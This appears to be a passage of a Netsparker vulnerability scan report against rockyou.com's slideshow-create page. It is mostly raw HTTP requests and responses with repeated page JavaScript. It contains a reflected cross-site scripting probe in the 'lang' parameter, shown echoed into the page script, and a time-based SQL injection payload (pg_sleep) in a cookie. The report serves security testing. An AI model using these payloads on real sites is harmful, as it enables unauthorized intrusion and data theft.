document.getElementById("partner_logo_small"); if (partner_logo_big) partner_logo_big.style.display = "none"; if (partner_logo_small) partner_logo_small.style.display = "block"; var rockyou_logo = document.getElementById("logo"); if (rockyou_logo) rockyou_logo.style.display = "block"; setupFileUploader(); printCountrySelect(document.getElementById("countryselect")); document.getElementById('loadingsection').innerHTML = ''; document.getElementById('loadingsection').style.display = 'none'; document.getElementById('ticker_area').style.display=""; document.getElementById('upload-and-customize').style.display=""; var bannerheading = document.getElementById('bannerheading'); if (bannerheading) bannerheading.style.display=""; initSectionsNew();}function initSectionsNew(){ supermaxUL(); //document.getElementById('toptab-container').style.display=""; document.getElementById('uploadsection').style.display=""; showUploadDiv(); hasInstanceIDEmbed(); simple_ajax_call('email/ajax_email_tracking.php?message=3&widget=slideshow&instanceid=0', false); openWithCreateMode = 1; document.getElementById("bebo_bubble").style.display = "block";}function initSections(){ if (openWithCreateMode == 1) { // randomize transition updateTransition("photostack2"); } document.getElementById('arrange-and-caption').style.display=""; document.getElementById('quickstyles').style.display=""; document.getElementById('div-upload').style.display=""; document.getElementById('tab-customize').style.display=""; document.getElementById('div-arrange').style.display=""; embed.isScale = false;currentSkin = ''; currentTransition = 'photostack'; currentRatio = 1; skinConfig = 1; currentTheme = ''; currentBackground = ''; setAspectRatioControls(); setBackgroundControls(); setSkinControls(); setSizeControls(); showCookieUploadTab(); showCustomizeDiv(); regUL(); refreshSlideShow(); refreshMusic(0); //Tags tagListArray = []; tagList(tagListArray); setPeopleMap('','','',''); //Songs songListArray = []; songList(songListArray); if (openWithCreateMode == 1) { simple_ajax_call('email/ajax_email_tracking.php?message=4&widget=slideshow&instanceid='+thisinstanceid, false); Set_Cookie('last_created_slideshow', thisinstanceid, 1); } else { if (thisinstanceid != parseInt(Get_Cookie('last_created_slideshow'))) { Set_Cookie('last_created_slideshow', 0, 1); } } // change the instruction var multi_uploader_instruction = document.getElementById("multi_uploader_instruction"); if (multi_uploader_instruction) { multi_uploader_instruction.innerHTML = '<p style="font-size:16px;font-weight:bold;margin-bottom:10px;">Next steps</p>' + '<ul style="font-size:13px;margin-left:10px;">' + '<li>Add more slides</li>' + '<li>To edit captions, scroll down</li>' + '<li>To move and delete slides, scroll down</li>' + '<li>Try the customization options to the right</li>' + '<li>Click Save when you\'re done</li>' + '</ul>' + '<p style="font-size:15px;margin-top:15px;">If you\'re having trouble uploading, <a target="_blank" href="/contact.php" style="text-decoration:underline">let us know</a>.</p>'; } setDefaultPublishSize(3); if (Get_Cookie('bubble_html_file_upload_edit_hide') == null) { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_bottom'; } } else { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_hidden'; } } document.getElementById("bebo_bubble").style.display = "none"; if (Get_Cookie('bubble_save_hide') == null) { document.getElementById("bubble_save1").style.display = "block"; } else { document.getElementById("bubble_save1").style.display = "none"; } //Colors loadSV(); updateH('F1FFCC'); if (window.attachEvent) { window.attachEvent("onbeforeunload", confirmAbandon); } balance_tabs_reset(); setTimeout("balance_tabs_set();", 1000);}function hasInstanceIDEmbed(){ var loc = window.location.href; var instanceString = loc.match("#instanceid=([0-9]*)"); if (instanceString != null) { if (parseInt(instanceString[1]) > 0) window.location='slideshow-create.php?lang='%22%3E%3Cnet%20sparker=netsparker(0x0014B2)%3E&refid=3&create=1&instanceid='+instanceString[1]; }}// Flash uploader calls this function when the user has chosen image(s) to upload and on initfunction beginFlashUpload() { var initObj = {}; initObj.instanceid = thisinstanceid; initObj.infront = (document.getElementById('uploadplace').infront.checked) ? true : false; initObj.dataHost = 'http://www.rockyou.com/addimage.php?type=file_html&userid=-1'; return initObj;}// Called on return of flash uploaderfunction flashUploadComplete(instanceid, errorcode, errormessage) { urchinTracker('/flashuploader/complete'); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid); membed = new musicEmbed(instanceid); embed.setLocal(true); embed.noSound=true; embed.noShare=true; //Reload page with slideshow var location = window.location.href; if (location.indexOf('?') != -1) location += "&instanceid="+instanceid; else location += "?instanceid="+instanceid; window.location = location; } else { if (parseInt(errorcode) > 0) { document.getElementById('ulerror').style.display=''; document.getElementById('ulerror').innerHTML=errorcode + " - " + errormessage; } else { document.getElementById('ulerror').innerHTML=""; document.getElementById('ulerror').style.display='none'; refreshList(); clearCaptions(); clearEntry(); } if (removePreviewSlide == 1) { setTimeout('xmlhttpPost("remove_preview_slide", 1);', 1000); removePreviewSlide = 0; } }}function uploadComplete(errorcode, errormessage, url, instanceid){ if (parseInt(errorcode) > 0) { ghost_popup.show("photo upload failed", 13, 10, 60, 100, 1, "frm"); } else { ghost_popup.show("photo uploaded", 13, 10, 60, 100, 1, "frm"); } var form2 = document.getElementById("form2"); if (form2) { form2.reset(); } hideUploading(); clearInterval(progressInterval); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid); membed = new musicEmbed(instanceid); embed.setLocal(t..
Date: Mon, 18 Apr 2011 22:16:42 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:16:41 GMT; path=/; domain=.rockyou.com,lang=en; expires=Thu, 28-Apr-2011 22:16:42 GMT; path=/; domain=.rockyou.com,lastlogin=1303165002; expires=Wed, 27-Jul-2011 22:16:42 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:16:42 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=26422 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 26856
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML>
<HEAD>
<TITLE>RockYou.com - photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE>
<script type="text/javascript">
<!--
function newImage(arg) {
if (document.images) {
rslt = new Image();
rslt.src = arg;
return rslt;
}
}
function changeImages() {
if (document.images && (preloadFlag == true)) {
for (var i=0; i<changeImages.arguments.length; i+=2) {
document[changeImages.arguments[i]].src = changeImages.arguments[i+1];
}
}
}
var preloadFlag = false;
function preloadImages() {
if (document.images) {
create_over = newImage("/images/create-over.png");
mystuff_over = newImage("/images/mystuff-over.png");
topshows_over = newImage("/images/topshows-over.png");
preloadFlag = true;
}
}
function Set_Cookie( name, value, expires)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires ) {
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
";domain=.rockyou.com";
}
function Get_Cookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) {
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
function Delete_Cookie( name, path) {
if ( Get_Cookie( name ) ) document.cookie = name + "=;domain=.rockyou.com;expires=Thu, 01-Jan-1970 00:00:01 GMT";
}
function showHelp(name)
{
urchinTracker ('/help/'+name);
newwindow= window.open('/popuphelp.php?name='+name,'helppage','toolbar=no, status=no,height=500, width=300,scrollbars=1');
if (window.focus) newwindow.focus();
}
function toggle_frontpage_sound() {
var frontpage_music = document.getElementById("frontpage_music");
if (frontpage_music) frontpage_music.blur();
// Toggle text
var music_text_span = document.getElementById("music_text_span");
if (music_text_span)
music_text_span.innerHTML = (music_text_span.innerHTML == 'MUTE') ? 'LISTEN' : 'MUTE';
// Toggle speaker image
var speaker_button = document.getElementById("speaker_button");
if (speaker_button)
speaker_button.src = (speaker_button.src == "http://dev2.rockyou.com/images/bling3/speaker.png") ?
"http://dev2.rockyou.com/images/bling3/speaker-on.png" : "http://dev2.rockyou.com/images/bling3/speaker.png";
// Toggle sound
var showcase_slide_embed = document.getElementById("showcase_slide_embed");
if (showcase_slide_embed) {
if (showcase_slide_embed.innerHTML.indexOf('nosound=false') != -1) {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=false/, 'nosound=true');
Set_Cookie('frontpage_music_disabled', '1', 1);
}
else {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=true/, 'nosound=false');
Set_Cookie('frontpage_music_disabled', '0', 1);
}
}
}
function toggle_frontpage_music_icon() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("showcase_slide_embed");
if (frontpage_music) {
if (frontpage_music.innerHTML.indexOf("turn-on") >= 0) {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-on/, 'turn-off')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-off/, 'turn-on')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
frontpage_music.blur();
}
function toggle_frontpage_music_text() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("slide-container");
if (frontpage_music) {
if (frontpage_music.innerHTML == "turn music on") {
frontpage_music.innerHTML = "turn music off";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=false" ');
}
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = "turn music on";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=true" ');
}
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
}
// -->
</script>
<script src="create-slideshow-js-combined.php?ver=2" type="text/javascript"></script><script src="/js/greybox/jquery-latest.js" type="text/javascript"></script><script src="/js/greybox/greybox.js?2" type="text/javascript"></script><script src="/js/common.js" type="text/javascript"></script><link href="http://cdn.rockyou.com/apps/mainsite/css/style.css" rel="stylesheet" type="text/css">
<link href="/css/create-slideshow-combined.css?ver=6" rel="stylesheet" type="text/css"><link href="/css/../js/greybox/greybox.css?ver=6" rel="stylesheet" type="text/css">
</HEAD>
<BODY class="background_normal"
style=""
LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0
onload="initDND();"
onunload=""
>
<!-- Comscore tracking. Comscore tracks every time a resource on rockyou is loaded with these params. -->
<img src="http://apps.rockyou.com/dot.gif?CXNID=1000017.0NXC">
<!-- TF 728x90 JScript NoAD code -->
<div style="height:5px;padding:0px;margin:0px;overflow:hidden"></div>
<script language="javascript" type="text/javascript" src="/js/flash_file_uploader.js"></script><script language="javascript" type="text/javascript" src="/js/iuembed.js"></script><script type="text/javascript">// Suppress multifile uploadervar suppressMulti = false;// variable needed for grey box modal dialog for the 'More Songs' linkvar GB_ANIMATION = true; // we have a variable in create.js that needs to know about the right translation for a text.var lang_upload_confirm_delete_slide = "Do you really want to delete this slide?";var lang_slideshow_aspect_43_only = "Only 4:3 Available";var lang_slideshow_aspect_43 = "TV (4:3)";var lang_slideshow_aspect_21 = "Wide (2:1)";var lang_slideshow_aspect_31 = "Strip (3:1)";var lang_empty_caption = "[Click to Add a Caption]";var lang_remove_all_captions = "Are you sure you want to remove all captions?";var lang_abandon_slideshow = "Abandon this slideshow and START OVER?";var evalThis;var thisinstanceid = '';var tagListArray; var xmlreqs = true; //Disable / enable xmlrequestsvar xmlBatchReq = ""; //Batch Stringvar playingSong = 0; //Current Song that is playingvar storedSongList = ""; //List of Songs responde from AJAXvar statusAddingSong = false;var mycustomtabs = new Array("cattags","transitions","themes","skins","backgrounds", "music","privacy","size","caption","min");var openWithCreateMode = 0;var sizeLevel = 3;var pitchLearnMoreBeboBands = 1; var slideCount = 0;var beforeUnloadStatus = 0;var beforeUnloadStatusEnabled = 1;var bgColorManualSet = 0;var ghost_popup = new Ghost_Popup('ghost_popup');var ghost_popup_music = new Ghost_Popup('ghost_popup_music');var source = "";var currentSkin = '';var currentTransition = '';var currentBackground = '';var currentTheme = '';var currentRatio = 0;var skinConfig = 1;var removePreviewSlide = 0;var slideShowCount="0";//var slideShowCount="0";embed = new appEmbed(thisinstanceid);membed = new musicEmbed(thisinstanceid);embed.setLocal(true);embed.noSound=true;embed.noShare=true;function confirmAbandon() { if (openWithCreateMode == 1 && slideCount > 0 && beforeUnloadStatus == 1) { event.returnValue = "If you continue, this slideshow will be abandoned!"; } beforeUnloadStatus = beforeUnloadStatusEnabled;}function initDND() { document.getElementById('loadingsection_container').className = 'background_normal'; // for partner sites, switch to smaller logo var partner_logo_big = document.getElementById("partner_logo_big"); var partner_logo_small = document.getElementById("partner_logo_small"); if (partner_logo_big) partner_logo_big.style.display = "none"; if (partner_logo_small) partner_logo_small.style.display = "block"; var rockyou_logo = document.getElementById("logo"); if (rockyou_logo) rockyou_logo.style.display = "block"; setupFileUploader(); printCountrySelect(document.getElementById("countryselect")); document.getElementById('loadingsection').innerHTML = ''; document.getElementById('loadingsection').style.display = 'none'; document.getElementById('ticker_area').style.display=""; document.getElementById('upload-and-customize').style.display=""; var bannerheading = document.getElementById('bannerheading'); if (bannerheading) bannerheading.style.display=""; initSectionsNew();}function initSectionsNew(){ supermaxUL(); //document.getElementById('toptab-container').style.display=""; document.getElementById('uploadsection').style.display=""; showUploadDiv(); hasInstanceIDEmbed(); simple_ajax_call('email/ajax_email_tracking.php?message=3&widget=slideshow&instanceid=0', false); openWithCreateMode = 1; document.getElementById("bebo_bubble").style.display = "block";}function initSections(){ if (openWithCreateMode == 1) { // randomize transition updateTransition("photostack2"); } document.getElementById('arrange-and-caption').style.display=""; document.getElementById('quickstyles').style.display=""; document.getElementById('div-upload').style.display=""; document.getElementById('tab-customize').style.display=""; document.getElementById('div-arrange').style.display=""; embed.isScale = false;currentSkin = ''; currentTransition = 'photostack'; currentRatio = 1; skinConfig = 1; currentTheme = ''; currentBackground = ''; setAspectRatioControls(); setBackgroundControls(); setSkinControls(); setSizeControls(); showCookieUploadTab(); showCustomizeDiv(); regUL(); refreshSlideShow(); refreshMusic(0); //Tags tagListArray = []; tagList(tagListArray); setPeopleMap('','','',''); //Songs songListArray = []; songList(songListArray); if (openWithCreateMode == 1) { simple_ajax_call('email/ajax_email_tracking.php?message=4&widget=slideshow&instanceid='+thisinstanceid, false); Set_Cookie('last_created_slideshow', thisinstanceid, 1); } else { if (thisinstanceid != parseInt(Get_Cookie('last_created_slideshow'))) { Set_Cookie('last_created_slideshow', 0, 1); } } // change the instruction var multi_uploader_instruction = document.getElementById("multi_uploader_instruction"); if (multi_uploader_instruction) { multi_uploader_instruction.innerHTML = '<p style="font-size:16px;font-weight:bold;margin-bottom:10px;">Next steps</p>' + '<ul style="font-size:13px;margin-left:10px;">' + '<li>Add more slides</li>' + '<li>To edit captions, scroll down</li>' + '<li>To move and delete slides, scroll down</li>' + '<li>Try the customization options to the right</li>' + '<li>Click Save when you\'re done</li>' + '</ul>' + '<p style="font-size:15px;margin-top:15px;">If you\'re having trouble uploading, <a target="_blank" href="/contact.php" style="text-decoration:underline">let us know</a>.</p>'; } setDefaultPublishSize(3); if (Get_Cookie('bubble_html_file_upload_edit_hide') == null) { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_bottom'; } } else { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_hidden'; } } document.getElementById("bebo_bubble").style.display = "none"; if (Get_Cookie('bubble_save_hide') == null) { document.getElementById("bubble_save1").style.display = "block"; } else { document.getElementById("bubble_save1").style.display = "none"; } //Colors loadSV(); updateH('F1FFCC'); if (window.attachEvent) { window.attachEvent("onbeforeunload", confirmAbandon); } balance_tabs_reset(); setTimeout("balance_tabs_set();", 1000);}function hasInstanceIDEmbed(){ var loc = window.location.href; var instanceString = loc.match("#instanceid=([0-9]*)"); if (instanceString != null) { if (parseInt(instanceString[1]) > 0) window.location='slideshow-create.php?lang='%22%3E%3Cnet%20sparker=netsparker(0x0014B2)%3E&refid=3&create=1&instanceid='+instanceString[1]; }}// Flash uploader calls this function when the user has chosen image(s) to upload and on initfunction beginFlashUpload() { var initObj = {}; initObj.instanceid = thisinstanceid; initObj.infront = (document.getElementById('uploadplace').infront.checked) ? true : false; initObj.dataHost = 'http://www.rockyou.com/addimage.php?type=file_html&userid=-1'; return initObj;}// Called on return of flash uploaderfunction flashUploadComplete(instanceid, errorcode, errormessage) { urchinTracker('/flashuploader/complete'); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid); membed = new musicEmbed(instanceid); embed.setLocal(true); embed.noSound=true; embed.noShare=true; //Reload page with slideshow var location = window.location.href; if (location.indexOf('?') != -1) location += "&instanceid="+instanceid; else location += "?instanceid="+instanceid; window.location = location; } else { if (parseInt(errorcode) > 0) { document.getElementById('ulerror').style.display=''; document.getElementById('ulerror').innerHTML=errorcode + " - " + errormessage; } else { document.getElementById('ulerror').innerHTML=""; document.getElementById('ulerror').style.display='none'; refreshList(); clearCaptions(); clearEntry(); } if (removePreviewSlide == 1) { setTimeout('xmlhttpPost("remove_preview_slide", 1);', 1000); removePreviewSlide = 0; } }}function uploadComplete(errorcode, errormessage, url, instanceid){ if (parseInt(errorcode) > 0) { ghost_popup.show("photo upload failed", 13, 10, 60, 100, 1, "frm"); } else { ghost_popup.show("photo uploaded", 13, 10, 60, 100, 1, "frm"); } var form2 = document.getElementById("form2"); if (form2) { form2.reset(); } hideUploading(); clearInterval(progressInterval); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid); membed = new musicEmbed(instanceid); embed.setLocal(t..
|
- /slideshow-create.php
/slideshow-create.php |
Parameters
| Parameter | Type | Value |
| lang | GET | '"><net sparker=alert(0x001DCE)> |
| source | GET | br |
Request
GET /slideshow-create.php?lang='%22%3E%3Cnet%20sparker=netsparker(0x001DCE)%3E&source=br HTTP/1.1
Referer: http://www.rockyou.com/slideshow-create.php?source=br
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303165651; ctid=3; sns_type=rockyou.com; istack=158777336%7Cwww202.rockyou.com%7C%7C158777337%7Cwww202.rockyou.com%7C%7C158777339%7Cwww202.rockyou.com%7C%7C158777341%7Cwww202.rockyou.com%7C%7C158777342%7Cwww202.rockyou.com%7C%7C158777345%7Cwww202.rockyou.com%7C%7C158777346%7Cwww202.rockyou.com%7C%7C158777348%7Cwww202.rockyou.com%7C%7C158777349%7Cwww202.rockyou.com%7C%7C158777351%7Cwww202.rockyou.com; pubtype=facebook; ultype=facebook; referralid=1%29%29%3BSELECT+pg_sleep%2825%29--
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://www.rockyou.com/slideshow-create.php?source=br
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303165651; ctid=3; sns_type=rockyou.com; istack=158777336%7Cwww202.rockyou.com%7C%7C158777337%7Cwww202.rockyou.com%7C%7C158777339%7Cwww202.rockyou.com%7C%7C158777341%7Cwww202.rockyou.com%7C%7C158777342%7Cwww202.rockyou.com%7C%7C158777345%7Cwww202.rockyou.com%7C%7C158777346%7Cwww202.rockyou.com%7C%7C158777348%7Cwww202.rockyou.com%7C%7C158777349%7Cwww202.rockyou.com%7C%7C158777351%7Cwww202.rockyou.com; pubtype=facebook; ultype=facebook; referralid=1%29%29%3BSELECT+pg_sleep%2825%29--
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 22:27:32 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:27:31 GMT; path=/; domain=.rockyou.com,lang=en; expires=Thu, 28-Apr-2011 22:27:32 GMT; path=/; domain=.rockyou.com,lastlogin=1303165652; expires=Wed, 27-Jul-2011 22:27:32 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:27:32 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=26144 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 26862
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML>
<HEAD>
<TITLE>RockYou.com - photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE>
<script type="text/javascript">
<!--
function newImage(arg) {
if (document.images) {
rslt = new Image();
rslt.src = arg;
return rslt;
}
}
function changeImages() {
if (document.images && (preloadFlag == true)) {
for (var i=0; i<changeImages.arguments.length; i+=2) {
document[changeImages.arguments[i]].src = changeImages.arguments[i+1];
}
}
}
var preloadFlag = false;
function preloadImages() {
if (document.images) {
create_over = newImage("/images/create-over.png");
mystuff_over = newImage("/images/mystuff-over.png");
topshows_over = newImage("/images/topshows-over.png");
preloadFlag = true;
}
}
function Set_Cookie( name, value, expires)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires ) {
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
";domain=.rockyou.com";
}
function Get_Cookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) {
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
function Delete_Cookie( name, path) {
if ( Get_Cookie( name ) ) document.cookie = name + "=;domain=.rockyou.com;expires=Thu, 01-Jan-1970 00:00:01 GMT";
}
function showHelp(name)
{
urchinTracker ('/help/'+name);
newwindow= window.open('/popuphelp.php?name='+name,'helppage','toolbar=no, status=no,height=500, width=300,scrollbars=1');
if (window.focus) newwindow.focus();
}
function toggle_frontpage_sound() {
var frontpage_music = document.getElementById("frontpage_music");
if (frontpage_music) frontpage_music.blur();
// Toggle text
var music_text_span = document.getElementById("music_text_span");
if (music_text_span)
music_text_span.innerHTML = (music_text_span.innerHTML == 'MUTE') ? 'LISTEN' : 'MUTE';
// Toggle speaker image
var speaker_button = document.getElementById("speaker_button");
if (speaker_button)
speaker_button.src = (speaker_button.src == "http://dev2.rockyou.com/images/bling3/speaker.png") ?
"http://dev2.rockyou.com/images/bling3/speaker-on.png" : "http://dev2.rockyou.com/images/bling3/speaker.png";
// Toggle sound
var showcase_slide_embed = document.getElementById("showcase_slide_embed");
if (showcase_slide_embed) {
if (showcase_slide_embed.innerHTML.indexOf('nosound=false') != -1) {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=false/, 'nosound=true');
Set_Cookie('frontpage_music_disabled', '1', 1);
}
else {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=true/, 'nosound=false');
Set_Cookie('frontpage_music_disabled', '0', 1);
}
}
}
function toggle_frontpage_music_icon() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("showcase_slide_embed");
if (frontpage_music) {
if (frontpage_music.innerHTML.indexOf("turn-on") >= 0) {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-on/, 'turn-off')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-off/, 'turn-on')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
frontpage_music.blur();
}
function toggle_frontpage_music_text() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("slide-container");
if (frontpage_music) {
if (frontpage_music.innerHTML == "turn music on") {
frontpage_music.innerHTML = "turn music off";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=false" ');
}
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = "turn music on";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=true" ');
}
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
}
// -->
</script>
<script src="create-slideshow-js-combined.php?ver=2" type="text/javascript"></script><script src="/js/greybox/jquery-latest.js" type="text/javascript"></script><script src="/js/greybox/greybox.js?2" type="text/javascript"></script><script src="/js/common.js" type="text/javascript"></script><link href="http://cdn.rockyou.com/apps/mainsite/css/style.css" rel="stylesheet" type="text/css">
<link href="/css/create-slideshow-combined.css?ver=6" rel="stylesheet" type="text/css"><link href="/css/../js/greybox/greybox.css?ver=6" rel="stylesheet" type="text/css">
</HEAD>
<BODY class="background_normal"
style=""
LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0
onload="initDND();"
onunload=""
>
<!-- Comscore tracking. Comscore tracks every time a resource on rockyou is loaded with these params. -->
<img src="http://apps.rockyou.com/dot.gif?CXNID=1000017.0NXC">
<!-- TF 728x90 JScript NoAD code -->
<div style="height:5px;padding:0px;margin:0px;overflow:hidden"></div>
<script language="javascript" type="text/javascript" src="/js/flash_file_uploader.js"></script><script language="javascript" type="text/javascript" src="/js/iuembed.js"></script><script type="text/javascript">// Suppress multifile uploadervar suppressMulti = false;// variable needed for grey box modal dialog for the 'More Songs' linkvar GB_ANIMATION = true; // we have a variable in create.js that needs to know about the right translation for a text.var lang_upload_confirm_delete_slide = "Do you really want to delete this slide?";var lang_slideshow_aspect_43_only = "Only 4:3 Available";var lang_slideshow_aspect_43 = "TV (4:3)";var lang_slideshow_aspect_21 = "Wide (2:1)";var lang_slideshow_aspect_31 = "Strip (3:1)";var lang_empty_caption = "[Click to Add a Caption]";var lang_remove_all_captions = "Are you sure you want to remove all captions?";var lang_abandon_slideshow = "Abandon this slideshow and START OVER?";var evalThis;var thisinstanceid = '';var tagListArray; var xmlreqs = true; //Disable / enable xmlrequestsvar xmlBatchReq = ""; //Batch Stringvar playingSong = 0; //Current Song that is playingvar storedSongList = ""; //List of Songs responde from AJAXvar statusAddingSong = false;var mycustomtabs = new Array("cattags","transitions","themes","skins","backgrounds", "music","privacy","size","caption","min");var openWithCreateMode = 0;var sizeLevel = 3;var pitchLearnMoreBeboBands = 1; var slideCount = 0;var beforeUnloadStatus = 0;var beforeUnloadStatusEnabled = 1;var bgColorManualSet = 0;var ghost_popup = new Ghost_Popup('ghost_popup');var ghost_popup_music = new Ghost_Popup('ghost_popup_music');var source = "br";var currentSkin = '';var currentTransition = '';var currentBackground = '';var currentTheme = '';var currentRatio = 0;var skinConfig = 1;var removePreviewSlide = 0;var slideShowCount="0";//var slideShowCount="0";embed = new appEmbed(thisinstanceid);membed = new musicEmbed(thisinstanceid);embed.setLocal(true);embed.noSound=true;embed.noShare=true;function confirmAbandon() { if (openWithCreateMode == 1 && slideCount > 0 && beforeUnloadStatus == 1) { event.returnValue = "If you continue, this slideshow will be abandoned!"; } beforeUnloadStatus = beforeUnloadStatusEnabled;}function initDND() { document.getElementById('loadingsection_container').className = 'background_normal'; // for partner sites, switch to smaller logo var partner_logo_big = document.getElementById("partner_logo_big"); var partner_logo_small = document.getElementById("partner_logo_small"); if (partner_logo_big) partner_logo_big.style.display = "none"; if (partner_logo_small) partner_logo_small.style.display = "block"; var rockyou_logo = document.getElementById("logo"); if (rockyou_logo) rockyou_logo.style.display = "block"; setupFileUploader(); printCountrySelect(document.getElementById("countryselect")); document.getElementById('loadingsection').innerHTML = ''; document.getElementById('loadingsection').style.display = 'none'; document.getElementById('ticker_area').style.display=""; document.getElementById('upload-and-customize').style.display=""; var bannerheading = document.getElementById('bannerheading'); if (bannerheading) bannerheading.style.display=""; initSectionsNew();}function initSectionsNew(){ supermaxUL(); //document.getElementById('toptab-container').style.display=""; document.getElementById('uploadsection').style.display=""; 